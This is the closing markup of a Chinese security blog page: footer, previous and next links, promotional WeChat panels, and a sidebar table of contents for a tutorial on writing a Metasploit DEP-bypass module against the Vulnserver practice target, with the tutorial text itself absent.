d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></div> <div class="last-updated"><span class="prefix">上次更新: </span> <span class="time">2022/5/23</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
        ←
        <a href="/md/hack/tools/2022-04-17-024-Metasploit-Meterpreter-Shell信息收集相关的命令.html" class="prev">
          Metasploit-Meterpreter-Shell信息收集相关的命令
        </a></span> <span class="next"><a href="/md/hack/tools/2022-04-17-026-Metasploit渗透php-utility-belt程序.html">
          Metasploit渗透php-utility-belt程序
        </a>
        →
      </span></p></div> </main></div> <aside class="page-sidebar"> <div class="page-side-toolbar"><div class="option-box-toc-fixed"><div class="toc-container-sidebar"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:650px"><div style="font-weight:bold;text-align:center;">使用Metasploit编写绕过DEP渗透模块</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将靶机设置dep保护" class="toc-sidebar-link">将靶机设置DEP保护</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#开启vlunserver监听" class="toc-sidebar-link">开启Vlunserver监听</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#开启immunitydebugger" class="toc-sidebar-link">开启ImmunityDebugger</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将vulnserver进程加载到immunitydebugger" class="toc-sidebar-link">将Vulnserver进程加载到ImmunityDebugger</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#查找vulnserver运行时加载的所有dll信息" class="toc-sidebar-link">查找Vulnserver运行时加载的所有DLL信息</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将msvcrt-dll上传到kali的-root目录下" class="toc-sidebar-link">将msvcrt.dll上传到Kali的/root目录下</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#查找rop指令片段" class="toc-sidebar-link">查找ROP指令片段</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#创建rop链" class="toc-sidebar-link">创建ROP链</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb" class="toc-sidebar-link">编写绕过DEP的Metasploit模块脚本depattackby_binghe.rb</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#上传脚本dep-attack-by-binghe-rb" class="toc-sidebar-link">上传脚本depattackby_binghe.rb</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#关闭immunitydebugger重新启动vulnserver" class="toc-sidebar-link">关闭ImmunityDebugger重新启动Vulnserver</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#在kali上执行" class="toc-sidebar-link">在Kali上执行</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#写在最后" class="toc-sidebar-link">写在最后</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box-toc-over"><img src="/images/system/toc.png" class="nozoom"> <span class="show-txt">目录</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:550px"><div style="font-weight:bold;text-align:center;">使用Metasploit编写绕过DEP渗透模块</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将靶机设置dep保护" class="toc-sidebar-link">将靶机设置DEP保护</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#开启vlunserver监听" class="toc-sidebar-link">开启Vlunserver监听</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#开启immunitydebugger" class="toc-sidebar-link">开启ImmunityDebugger</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将vulnserver进程加载到immunitydebugger" class="toc-sidebar-link">将Vulnserver进程加载到ImmunityDebugger</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#查找vulnserver运行时加载的所有dll信息" class="toc-sidebar-link">查找Vulnserver运行时加载的所有DLL信息</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#将msvcrt-dll上传到kali的-root目录下" class="toc-sidebar-link">将msvcrt.dll上传到Kali的/root目录下</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#查找rop指令片段" class="toc-sidebar-link">查找ROP指令片段</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#创建rop链" class="toc-sidebar-link">创建ROP链</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#编写绕过dep的metasploit模块脚本dep-attack-by-binghe-rb" class="toc-sidebar-link">编写绕过DEP的Metasploit模块脚本depattackby_binghe.rb</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#上传脚本dep-attack-by-binghe-rb" class="toc-sidebar-link">上传脚本depattackby_binghe.rb</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#关闭immunitydebugger重新启动vulnserver" class="toc-sidebar-link">关闭ImmunityDebugger重新启动Vulnserver</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#在kali上执行" class="toc-sidebar-link">在Kali上执行</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html#写在最后" class="toc-sidebar-link">写在最后</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box"><img src="/images/system/wechat.png" class="nozoom"> <span class="show-txt">手机看</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.9rem">微信扫一扫</span> <img height="180px" src="https://api.qrserver.com/v1/create-qr-code/?data=https://binghe001.github.io/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html" style="margin:10px;">
                可以<b>手机看</b>或分享至<b>朋友圈</b></div></div></div></div> <div class="option-box"><img src="/images/system/toggle.png" width="30px" class="nozoom"> <span class="show-txt">左栏</span></div> <div class="option-box"><img src="/images/system/xingqiu.png" width="25px" class="nozoom"> <span class="show-txt">星球</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">实战项目<span style="font-size:8px;color:red;">「SpringCloud Alibaba实战项目」</span>、专属电子书、问题解答、简历指导、技术分享、晋升指导、视频课程</span> <img height="180px" src="/images/personal/xingqiu.png" style="margin:10px;"> <b>知识星球</b>：冰河技术
            </div></div></div></div> <div class="option-box"><img src="/images/system/wexin4.png" width="25px" class="nozoom"> <span class="show-txt">读者群</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">添加冰河微信<span style="color:red;">(hacker_binghe)</span>进冰河技术学习交流圈「无任何套路」</span> <img src="/images/personal/hacker_binghe.jpg" height="180px" style="margin:10px;">
                PS：添加时请备注<b>读者加群</b>，谢谢！
              </div></div></div></div> <div class="option-box"><img src="/images/system/download-2.png" width="25px" class="nozoom"> <span class="show-txt">下资料</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">扫描公众号，回复<span style="color:red;">“1024”</span>下载<span style="color:red;">100GB+</span>学习技术资料、PDF书籍、实战项目、简历模板等「无任何套路」</span> <img src="/images/personal/qrcode.png" height="180px" style="margin:10px;"> <b>公众号:</b> 冰河技术
              </div></div></div></div> <div class="option-box"><img src="/images/system/heart-1.png" width="25px" class="nozoom"> <span class="show-txt">赞赏我</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">鼓励/支持/赞赏我</span> <img height="180px" src="/images/personal/encourage-head.png" style="margin:5px;"> <br>1. 不靠它生存但仍希望得到你的鼓励；
                <br>2. 时刻警醒自己保持技术人的初心；
              </div></div></div></div> <div title="Metasploit-Meterpreter-Shell信息收集相关的命令" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-04-17-024-Metasploit-Meterpreter-Shell信息收集相关的命令.html"><img src="/images/system/pre2.png" width="30px" class="nozoom"> <span class="show-txt">上一篇</span></a></div> <div title="Metasploit渗透php-utility-belt程序" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-04-17-026-Metasploit渗透php-utility-belt程序.html"><img src="/images/system/next2.png" width="30px" class="nozoom"> <span class="show-txt">下一篇</span></a></div></div>  <!----> </aside></div><div class="global-ui"><div class="read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="read-more-btn" target="_self" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">阅读全文</a> <div id="btw-modal-wrap" style="display: none;"><div id="btw-mask" style="position: fixed; top: 0px; right: 0px; bottom: 0px; left: 0px; opacity: 0.7; z-index: 999; background: rgb(0, 0, 0);"></div> <div id="btw-modal" style="position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; text-align: center; font-size: 13px; background: rgb(255, 255, 255); border-radius: 10px; z-index: 9999; font-family: PingFangSC-Regular, sans-serif;"><span id="btw-modal-close-btn" style="position: absolute; top: 5px; right: 15px; line-height: 34px; font-size: 34px; cursor: pointer; opacity: 0.2; z-index: 9999; color: rgb(0, 0, 0); background: none; border: none; outline: none;">×</span> <p id="btw-modal-header" style="margin-top: 40px; line-height: 1.8; font-size: 13px;">
                扫码或搜索：<span style="color: #E9405A; font-weight: bold;">冰河技术</span> <br>发送：<span id="fustack-token" class="token" style="color: #e9415a; font-weight: bold; font-size: 17px; margin-bottom: 45px;">290992</span> <br>即可<span style="color: #e9415a; font-weight: bold;">立即永久</span>解锁本站全部文章</p> <img src="/images/personal/qrcode.png" style="width: 180px; margin-top: 10px; margin-bottom: 30px; border: 8px solid rgb(230, 230, 230);"></div></div></div><div class="pay-read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="pay-read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="pay-read-more-btn" target="_blank" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">付费阅读</a></div></div></div>
    <script src="/assets/js/cg-styles.js?v=1653305936337" defer></script><script src="/assets/js/cg-4.js?v=1653305936337" defer></script><script src="/assets/js/cg-3.js?v=1653305936337" defer></script><script src="/assets/js/cg-218.js?v=1653305936337" defer></script><script src="/assets/js/cg-5.js?v=1653305936337" defer></script><script src="/assets/js/cg-6.js?v=1653305936337" defer></script><script src="/assets/js/cg-app.js?v=1653305936337" defer></script>
  </body>
</html>
